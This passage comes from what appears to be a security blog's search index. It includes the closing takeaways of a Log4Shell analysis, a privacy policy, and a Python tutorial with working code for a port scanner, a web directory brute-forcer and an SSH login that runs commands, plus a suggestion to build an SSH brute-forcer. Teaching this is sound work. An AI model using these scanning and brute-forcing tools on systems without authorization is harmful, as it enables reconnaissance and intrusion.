\u0026lt;version\u0026gt;2.17.1\u0026lt;/version\u0026gt; \u0026lt;/dependency\u0026gt; Key Takeaways Never trust external input in logging contexts JNDI is dangerous in environments accepting user input Maintain an asset inventory to know where Log4j is deployed Virtual Patching (WAF rules) is critical for rapid response ","permalink":"https://cyberah-blog.pages.dev/en/cve/cve-2024-log4shell-analysis/","summary":"\u003cblockquote\u003e\n\u003cp\u003e⚠️ \u003cstrong\u003eDisclaimer\u003c/strong\u003e: This article is for educational purposes only. 
Only test on systems you have explicit authorization to test.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch2 id=\"overview\"\u003eOverview\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eVulnerability Type\u003c/strong\u003e: Remote Code Execution (RCE) via JNDI Injection\n\u003cstrong\u003eImpact\u003c/strong\u003e: Critical (CVSS 10.0)\n\u003cstrong\u003eAffected Systems\u003c/strong\u003e: Apache Log4j 2.0-beta9 to 2.14.1\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"how-the-vulnerability-works\"\u003eHow the Vulnerability Works\u003c/h2\u003e\n\u003ch3 id=\"understanding-jndi\"\u003eUnderstanding JNDI\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003eJNDI\u003c/strong\u003e (Java Naming and Directory Interface) is a Java API for connecting to directory services like LDAP.\u003c/p\u003e\n\u003cp\u003eThe problem: Log4j would interpret user input and fetch external resources:\u003c/p\u003e","title":"CVE Analysis — Log4Shell Pattern: A JNDI Injection Deep Dive"},{"content":"Privacy Policy Last updated: April 19, 2026\nData Collection We do not collect personally identifiable information. We use Google Analytics for anonymous traffic analysis.\nCookies We may use cookies to improve your reading experience and store preferences. You can disable them in your browser settings.\nAdvertising We use Google AdSense to display advertisements. Google may use cookies to show personalized ads based on your browsing.\nComments The comment system uses Giscus, linked to GitHub. Please review GitHub\u0026rsquo;s Privacy Statement.\nContact For any privacy inquiries: support@zerostrike.net\n","permalink":"https://cyberah-blog.pages.dev/en/privacy/","summary":"\u003ch2 id=\"privacy-policy\"\u003ePrivacy Policy\u003c/h2\u003e\n\u003cp\u003eLast updated: April 19, 2026\u003c/p\u003e\n\u003ch3 id=\"data-collection\"\u003eData Collection\u003c/h3\u003e\n\u003cp\u003eWe do not collect personally identifiable information. 
We use Google Analytics for anonymous traffic analysis.\u003c/p\u003e\n\u003ch3 id=\"cookies\"\u003eCookies\u003c/h3\u003e\n\u003cp\u003eWe may use cookies to improve your reading experience and store preferences. You can disable them in your browser settings.\u003c/p\u003e\n\u003ch3 id=\"advertising\"\u003eAdvertising\u003c/h3\u003e\n\u003cp\u003eWe use Google AdSense to display advertisements. Google may use cookies to show personalized ads based on your browsing.\u003c/p\u003e\n\u003ch3 id=\"comments\"\u003eComments\u003c/h3\u003e\n\u003cp\u003eThe comment system uses Giscus, linked to GitHub. Please review \u003ca href=\"https://docs.github.com/en/site-policy/privacy-policies/github-privacy-statement\"\u003eGitHub\u0026rsquo;s Privacy Statement\u003c/a\u003e.\u003c/p\u003e","title":"Privacy Policy"},{"content":"Why Python for Cybersecurity? Python is the #1 language for security professionals because of its rich libraries (socket, requests, scapy, paramiko), rapid development, and massive community.\nNetwork Programming Basics Single Port Checker import socket def check_port(host, port, timeout=1): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout) result = sock.connect_ex((host, port)) sock.close() return result == 0 except socket.error: return False target = \u0026#34;192.168.1.1\u0026#34; for port in range(1, 1025): if check_port(target, port): print(f\u0026#34;[+] Port {port} is OPEN\u0026#34;) Multithreaded Port Scanner import socket import concurrent.futures def scan_port(args): host, port = args try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(0.5) result = sock.connect_ex((host, port)) sock.close() if result == 0: try: service = socket.getservbyport(port) except Exception: service = \u0026#34;unknown\u0026#34; return port, service except Exception: pass return None def fast_scan(host, start=1, end=1024): print(f\u0026#34;[*] Scanning {host}...\u0026#34;) with 
concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor: results = executor.map(scan_port, [(host, p) for p in range(start, end+1)]) for result in results: if result: print(f\u0026#34;[+] {result[0]}/tcp OPEN {result[1]}\u0026#34;) fast_scan(\u0026#34;192.168.1.1\u0026#34;) HTTP Requests for Recon import requests from concurrent.futures import ThreadPoolExecutor def check_path(url, path): full_url = f\u0026#34;{url}/{path}\u0026#34; try: resp = requests.get(full_url, timeout=3, allow_redirects=False) if resp.status_code not in [404, 403]: return full_url, resp.status_code except requests.RequestException: pass return None def dir_bruteforce(url, wordlist_path): with open(wordlist_path) as f: words = [line.strip() for line in f if line.strip()] with ThreadPoolExecutor(max_workers=20) as executor: for result in executor.map(lambda w: check_path(url, w), words): if result: print(f\u0026#34;[{result[1]}] {result[0]}\u0026#34;) dir_bruteforce(\u0026#34;http://target.com\u0026#34;, \u0026#34;/usr/share/wordlists/dirb/common.txt\u0026#34;) SSH with Paramiko import paramiko def ssh_connect(host, username, password, port=22): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(host, port=port, username=username, password=password, timeout=5) _, stdout, _ = client.exec_command(\u0026#34;id \u0026amp;\u0026amp; hostname\u0026#34;) print(stdout.read().decode()) client.close() return True except paramiko.AuthenticationException: return False Recommended Projects to Build Port Scanner ← Start here Subdomain Enumeration tool Web Directory Brute-forcer Packet Sniffer using Scapy SSH brute-force (authorized targets only!) 
","permalink":"https://cyberah-blog.pages.dev/en/programming/python-for-hackers/","summary":"\u003ch2 id=\"why-python-for-cybersecurity\"\u003eWhy Python for Cybersecurity?\u003c/h2\u003e\n\u003cp\u003ePython is the #1 language for security professionals because of its rich libraries (\u003ccode\u003esocket\u003c/code\u003e, \u003ccode\u003erequests\u003c/code\u003e, \u003ccode\u003escapy\u003c/code\u003e, \u003ccode\u003eparamiko\u003c/code\u003e), rapid development, and massive community.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"network-programming-basics\"\u003eNetwork Programming Basics\u003c/h2\u003e\n\u003ch3 id=\"single-port-checker\"\u003eSingle Port Checker\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003esocket\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003echeck_port\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003etimeout\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003esock\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eAF_INET\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eSOCK_STREAM\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esettimeout\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003etimeout\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003econnect_ex\u003c/span\u003e\u003cspan class=\"p\"\u003e((\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e))\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eclose\u003c/span\u003e\u003cspan 
class=\"p\"\u003e()\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"o\"\u003e==\u003c/span\u003e \u003cspan class=\"mi\"\u003e0\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eerror\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eFalse\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003etarget\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"s2\"\u003e\u0026#34;192.168.1.1\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"nb\"\u003erange\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"mi\"\u003e1025\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan 
class=\"n\"\u003echeck_port\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003etarget\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;[+] Port \u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e is OPEN\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"multithreaded-port-scanner\"\u003eMultithreaded Port Scanner\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003esocket\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003econcurrent.futures\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003escan_port\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eargs\u003c/span\u003e\u003cspan 
class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003eargs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003esock\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eAF_INET\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eSOCK_STREAM\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esettimeout\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"mf\"\u003e0.5\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan 
class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003econnect_ex\u003c/span\u003e\u003cspan class=\"p\"\u003e((\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e))\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eclose\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"o\"\u003e==\u003c/span\u003e \u003cspan class=\"mi\"\u003e0\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e            \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e                \u003cspan class=\"n\"\u003eservice\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003egetservbyport\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e            \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"ne\"\u003eException\u003c/span\u003e\u003cspan 
class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e                \u003cspan class=\"n\"\u003eservice\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"s2\"\u003e\u0026#34;unknown\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e            \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eservice\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"ne\"\u003eException\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003epass\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eNone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003efast_scan\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003estart\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eend\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan 
class=\"mi\"\u003e1024\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;[*] Scanning \u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e...\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003ewith\u003c/span\u003e \u003cspan class=\"n\"\u003econcurrent\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003efutures\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eThreadPoolExecutor\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003emax_workers\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e100\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"k\"\u003eas\u003c/span\u003e \u003cspan class=\"n\"\u003eexecutor\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003eresults\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003eexecutor\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003emap\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003escan_port\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan 
class=\"p\"\u003e[(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003ep\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003ep\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"nb\"\u003erange\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003estart\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eend\u003c/span\u003e\u003cspan class=\"o\"\u003e+\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e)])\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"n\"\u003eresults\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e            \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;[+] \u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"mi\"\u003e0\u003c/span\u003e\u003cspan class=\"p\"\u003e]\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e/tcp  OPEN  
\u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e]\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003efast_scan\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;192.168.1.1\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"http-requests-for-recon\"\u003eHTTP Requests for Recon\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003erequests\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003efrom\u003c/span\u003e \u003cspan class=\"nn\"\u003econcurrent.futures\u003c/span\u003e \u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"n\"\u003eThreadPoolExecutor\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003echeck_path\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan 
class=\"n\"\u003eurl\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003epath\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"n\"\u003efull_url\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;\u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eurl\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e/\u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003epath\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003eresp\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003erequests\u003c/span\u003e\u003cspan 